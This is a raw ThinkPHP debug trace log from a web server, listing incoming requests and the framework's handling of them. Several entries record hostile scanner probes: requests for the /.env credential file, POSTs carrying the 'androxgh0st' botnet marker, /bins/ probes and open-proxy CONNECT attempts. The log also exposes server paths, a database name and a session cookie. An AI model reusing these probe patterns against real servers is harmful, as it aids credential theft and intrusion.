www.clcoa.com/ [运行时间:0.027526s][吞吐率:36.33req/s] [内存消耗:3,333.55kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001088s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.6179.117 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'www.clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=urn1sn0jrioktfa6elqudlb3l7', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001472s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000098s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T22:47:05+08:00 ] 176.65.149.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.027508s][吞吐率:36.35req/s] [内存消耗:3,332.27kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001145s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Go-http-client/1.1', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001504s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000099s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T22:53:13+08:00 ] 91.199.82.162 GET http://ip-api.com/json/ [ info ] ip-api.comhttp://ip-api.com/json/ [运行时间:0.020198s][吞吐率:49.51req/s] [内存消耗:2,225.24kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001254s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'json', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'ip-api.com', 'user-agent' => 'Go-http-client/1.1', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T22:58:04+08:00 ] 38.58.179.181 GET http://check.9tb.org/ [ info ] check.9tb.orghttp://check.9tb.org/ [运行时间:0.028753s][吞吐率:34.78req/s] [内存消耗:3,333.26kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001143s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'check.9tb.org', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001512s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000113s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:01:53+08:00 ] 87.121.84.172 GET http://api.caonimavip.xyz/ [ info ] api.caonimavip.xyzhttp://api.caonimavip.xyz/ [运行时间:0.030422s][吞吐率:32.87req/s] [内存消耗:3,333.09kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001178s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'api.caonimavip.xyz', 'user-agent' => 'Go-http-client/1.1', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001565s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000129s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:01:53+08:00 ] 87.121.84.172 CONNECT api.caonimavip.xyz:443 [ info ] api.caonimavip.xyz:443api.caonimavip.xyz:443 [运行时间:0.027148s][吞吐率:36.84req/s] [内存消耗:3,330.38kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001105s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'api.caonimavip.xyz:443', 'user-agent' => 'Go-http-client/1.1', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001474s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000126s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:01:54+08:00 ] 87.121.84.172 GET http://api.caonimavip.xyz/ [ info ] api.caonimavip.xyzhttp://api.caonimavip.xyz/ [运行时间:0.028851s][吞吐率:34.66req/s] [内存消耗:3,333.09kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001217s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'api.caonimavip.xyz', 'user-agent' => 'Go-http-client/1.1', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001609s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000127s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:01:55+08:00 ] 87.121.84.172 CONNECT api.caonimavip.xyz:443 [ info ] api.caonimavip.xyz:443api.caonimavip.xyz:443 [运行时间:0.028402s][吞吐率:35.21req/s] [内存消耗:3,330.38kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001116s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'api.caonimavip.xyz:443', 'user-agent' => 'Go-http-client/1.1', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001548s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000102s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:05:06+08:00 ] 198.235.24.186 GET / [ info ] www.clcoa.com/ [运行时间:0.029324s][吞吐率:34.10req/s] [内存消耗:3,331.87kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001218s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'www.clcoa.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001547s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000104s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:05:09+08:00 ] 204.76.203.18 GET /bins/ [ info ] 47.105.33.115:80/bins/ [运行时间:0.019856s][吞吐率:50.36req/s] [内存消耗:2,224.36kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001097s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'bins', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:05:16+08:00 ] 204.76.203.18 GET /bins/ [ info ] 47.105.33.115:80/bins/ [运行时间:0.020258s][吞吐率:49.36req/s] [内存消耗:2,224.36kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001315s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'bins', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:05:16+08:00 ] 204.76.203.18 GET /bins/ [ info ] 47.105.33.115:80/bins/ [运行时间:0.019944s][吞吐率:50.14req/s] [内存消耗:2,224.36kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001157s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'bins', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:05:18+08:00 ] 204.76.203.18 GET /bins/ [ info ] 47.105.33.115:80/bins/ [运行时间:0.019622s][吞吐率:50.96req/s] [内存消耗:2,224.36kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001216s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'bins', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:05:21+08:00 ] 204.76.203.18 GET /bins/ [ info ] 47.105.33.115:80/bins/ [运行时间:0.021151s][吞吐率:47.28req/s] [内存消耗:2,224.36kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001202s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'bins', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:05:38+08:00 ] 167.94.138.119 GET / [ info ] 47.105.33.115/ [运行时间:0.028729s][吞吐率:34.81req/s] [内存消耗:3,333.13kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001224s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001656s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000116s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:05:49+08:00 ] 167.94.138.119 GET /favicon.ico [ info ] 47.105.33.115/favicon.ico [运行时间:0.021221s][吞吐率:47.12req/s] [内存消耗:2,226.05kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001161s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'favicon.ico', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:06:03+08:00 ] 167.94.138.119 GET /wiki [ info ] 47.105.33.115/wiki [运行时间:0.020100s][吞吐率:49.75req/s] [内存消耗:2,225.88kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001196s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wiki', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:06:30+08:00 ] 123.160.234.80 GET / [ info ] 47.105.33.115/ [运行时间:0.029258s][吞吐率:34.18req/s] [内存消耗:3,333.64kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001205s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/4.049897920 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001701s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:11:41+08:00 ] 190.120.229.103 GET /.env [ info ] 47.105.33.115/.env [运行时间:0.019336s][吞吐率:51.72req/s] [内存消耗:2,226.11kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000062s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001154s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '.env', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:11:47+08:00 ] 190.120.229.103 POST / [ info ] 47.105.33.115/ [运行时间:0.051257s][吞吐率:19.51req/s] [内存消耗:4,788.22kb] [文件加载:77] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001228s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', 'content-length' => '20', 'content-type' => 'application/x-www-form-urlencoded', ) [ info ] [ PARAM ] array ( '0x' => array ( 0 => 'androxgh0st', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001666s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ DB ] INIT mysql [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.020359s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000419s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000896s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"0x\":[\"androxgh0st\"]}' , '/' , 0 , 'Unknown' , 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36' , '190.120.229.103' , 1765725107) [ RunTime:0.007372s ] --------------------------------------------------------------- [ 2025-12-14T23:11:55+08:00 ] 190.120.229.103 GET /.env [ info ] 47.105.33.115/.env [运行时间:0.019896s][吞吐率:50.26req/s] [内存消耗:2,228.74kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001156s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '.env', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:12:01+08:00 ] 190.120.229.103 POST / [ info ] 47.105.33.115/ [运行时间:0.045972s][吞吐率:21.75req/s] [内存消耗:4,788.62kb] [文件加载:77] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001157s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', 'content-length' => '20', 'content-type' => 'application/x-www-form-urlencoded', ) [ info ] [ PARAM ] array ( '0x' => array ( 0 => 'androxgh0st', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001521s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ DB ] INIT mysql [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.017029s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000616s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000976s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"0x\":[\"androxgh0st\"]}' , '/' , 0 , 'Unknown' , 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36' , '190.120.229.103' , 1765725121) [ RunTime:0.005092s ] --------------------------------------------------------------- [ 2025-12-14T23:14:02+08:00 ] 35.203.211.181 GET /.well-known/security.txt [ info ] 47.105.33.115:80/.well-known/security.txt [运行时间:0.019887s][吞吐率:50.28req/s] [内存消耗:2,225.28kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001213s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '.well-known', 1 => 'security.txt', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:24:00+08:00 ] 59.82.83.196 GET / [ info ] clcoa.com/ [运行时间:0.026698s][吞吐率:37.46req/s] [内存消耗:3,333.25kb] [文件加载:69] [ info ] [ 